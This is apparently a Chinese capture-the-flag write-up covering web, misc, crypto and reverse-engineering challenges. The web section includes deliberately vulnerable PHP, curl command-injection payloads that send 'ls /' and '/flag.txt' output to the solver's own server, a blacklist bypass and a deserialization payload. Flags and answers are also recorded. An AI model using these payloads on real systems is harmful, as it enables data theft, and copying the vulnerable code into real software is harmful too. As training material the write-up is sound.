WEB

YWB_Web_xff

源码泄露

<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    if ($cip == "2.2.2.1") {
        echo '<div class="success">';
        echo '<h2>登录成功！</h2>';
        $flag = file_get_contents('/flag.txt');
        echo '<p>flag{' . htmlspecialchars($flag) . '}</p>';
        echo '</div>';
    } else {
        echo '<div class="error">';
        echo '<h2>登录失败</h2>';
        echo '<p>IP地址验证失败</p>';
        echo '<p>当前IP: ' . htmlspecialchars($cip) . '</p>';
        echo '</div>';
    }
}

flag{9u60w1kemajt}

YWB_Web_未授权访问

SSTI无果注意到有cookie，更改cookie获得flag

flag{rpuqari28i9l}

easyweb

<?php

if(isset($_POST['cmd'])){
    @exec($_POST['cmd'],$res,$rc);
    //echo $rc;
}else{
    echo "It works!";
}

show_source(__FILE__);
?>

cmd=curl 自己的服务器IP+端口 --data "$(ls /)"
cmd=curl 自己的服务器IP+端口 --data "$(cat /flag.txt)"

flag{d4ek6s7kzztx}

YWB_Web_命令执行过滤绕过

<?php
# flag in flag.php
include("flag.php");
if(isset($_GET['cmd'])){
    $cmd = $_GET['cmd'];
    if(!preg_match("/system|exec|highlight|show_source|include|passthru|echo|print_r|cat|head|tail|more|less/i",$cmd)){
        if(preg_match("/flag/i",$cmd)){
            eval($cmd);
        } else {
            die("HACK!!");
        }
    } else {
        die("HACK!!!");
    }
} else {
    highlight_file(__FILE__);
}
?>

cmd=readfile('flag.php');

获得源码

<?
$filename = "/tmp/flag.nisp";
$content = trim(file_get_contents($filename));
?>

cmd=readfile('/tmp/flag.nisp');

flag{dnu3stfgjy61}

YWB_Web_反序列化

源码为

<?php
function filter($name){
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

class mylogin {
    var $user;
    var $pass;

    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}

if ($_POST['msg']) {
    $filtered_input = filter($_POST['msg']);

    $a = unserialize($filtered_input);

    if ($a instanceof mylogin) {
        if ($a->pass === "myzS@11wawq") {
            exit();
        } else {
            $tis = "您是小自吧，差一点就成功了!";
        }
    } else {
        $tis = "您输入的信息可能去非洲才能找到哦!";
    }
}
?>

直接写就行

<?php
function filter($name){
    $safe = array("flag", "php");
    return str_replace($safe, "hack", $name);
}

class mylogin {
    var $user;
    var $pass;

    function __construct($user, $pass) {
        $this->user = $user;
        $this->pass = $pass;
    }
}
$a=new mylogin('user','myzS@11wawq');
echo serialize($a);
//O:7:"mylogin":2:{s:4:"user";s:4:"user";s:4:"pass";s:11:"myzS@11wawq";}

MISC

ez_xor

先尝试一下，去除-后找到异或的字符为9999……

直接全部异或获得flag

flag{HCTFqweASD182}

光隙中的寄生密钥

先binwalk提取一个压缩包，发现需要密码，尝试爆破，得到密码9864

然后十六进制加base64得到flag

flag{!sK8hF3^vG7mX2qD}

被折叠的显影图纸

flag{0???c3_3@$Y_cR@Qk3!}

CRYPTO

cry_rsa

在一次RSA密钥对生成中，假设p=473398607161，q=4511491，e=19
求解出d,然后把d的值加6为flag值。flag格式为flag{********}

def mod_inverse(e, phi):
    def egcd(a, b):
        if a == 0:
            return b, 0, 1
        gcd, x1, y1 = egcd(b % a, a)
        x = y1 - (b // a) * x1
        y = x1
        return gcd, x, y
    
    _, x, _ = egcd(e, phi)
    return (x % phi + phi) % phi

p = 473398607161
q = 4511491
e = 19

n = p * q
phi = (p - 1) * (q - 1)
d = mod_inverse(e, phi)
flag_value = d + 6
flag = f"flag{{{flag_value}}}"

print(flag)

flag{2023326077889096385}

gift

五一劳动节爸爸给家里人带了一个礼物。由于礼物不好拿，所以把礼物平均分成了四份，但是其中一份不小心掉在地上散落成了无数片，变成了 1 - 1/3 + 1/5 - 1/7 + …
聪明的你能算出或猜出爸爸带的礼物是什么吗？flag示例: flag{apple} flag{watermelon} 提交flag值凯撒密码加密，偏移量10在提交。

先计算这个结果的值为Π/4，乘4后就变成Π，那么结果就可以为pie，偏移后为zso

flag{zso}

草甸方阵的密语

在记事本中打开发现mt2s6Zhu5nWA{87Uxc4Y}，根据题目推测是栅栏密码加凯撒密码

栅栏密码分7栏解密获得mshn{U4t6uW8xY2Z5A7c}，凯撒密码偏移为7获得flag

flag{N4m6nP8qR2S5T7v}

easy-签到题

厨子一把梭

flag{e3965207-1a4c-8b3d-6f2e-570193482b6a}

ez_base

在线网站https://www.spammimic.com/decode.cgi解密后获得base64字符串，解码后获得flag

flag{HNCTFlnlN81TXzo10TF}

RE

先用upx去壳，得到的文件拖IDA分析，需要rc4解密

# 定义密钥的初始数据
v1 = [
    0xB8C6B89FC8B99FC8,
    0xCFB7B0C51443528F,
    0xB1A8C6B99BC7AC9C,
    0xBDC68AB3C59299C5
]
v2 = -1499806587

# 构造密钥
key = b''
for num in v1:
    key += num.to_bytes(8, 'little')  # 将v1中的每个数字转换为8字节的小端字节序列
key += v2.to_bytes(4, 'little', signed=True)  # 将v2转换为4字节的小端字节序列，并将其追加到密钥中

# 定义密文的初始数据
v3 = [
    0x97124DF289B15A46,
    0xB9D8B54F60840402,
    0xB522866085D4D908
]
cipher = b''
for num in v3:
    cipher += num.to_bytes(8, 'little')  # 将v3中的每个数字转换为8字节的小端字节序列

# 处理v4的覆盖部分
v4_initial = 0xA565739C2C9A1F21.to_bytes(8, 'little')  # 定义v4的初始8字节
overwrite_val = 0x2AC6CE0FA6F5A5
overwrite_bytes = overwrite_val.to_bytes(8, 'little')  # 定义覆盖的8字节

# 合并v4的初始字节和覆盖字节
v4_part = bytearray(v4_initial[:7])  # 取v4初始字节的前7字节
v4_part += overwrite_bytes           # 将覆盖的8字节追加到v4_part中
cipher += bytes(v4_part)             # 将v4_part追加到密文中

# 定义RC4解密函数
def rc4_decrypt(key, ciphertext):
    S = list(range(256))  # 初始化S盒
    j = 0
    # 初始化S盒
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # 生成密钥流并解密
    i = j = 0
    plain = []
    for byte in ciphertext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        k = S[(S[i] + S[j]) % 256]
        plain.append(byte ^ k)
    return bytes(plain)

# 使用RC4解密密文并输出结果
flag = rc4_decrypt(key, cipher)
print("Flag:", flag.decode('latin-1', errors='replace'))

flag{9bb8dc2af053d3a8f9d5f410eb5278a5}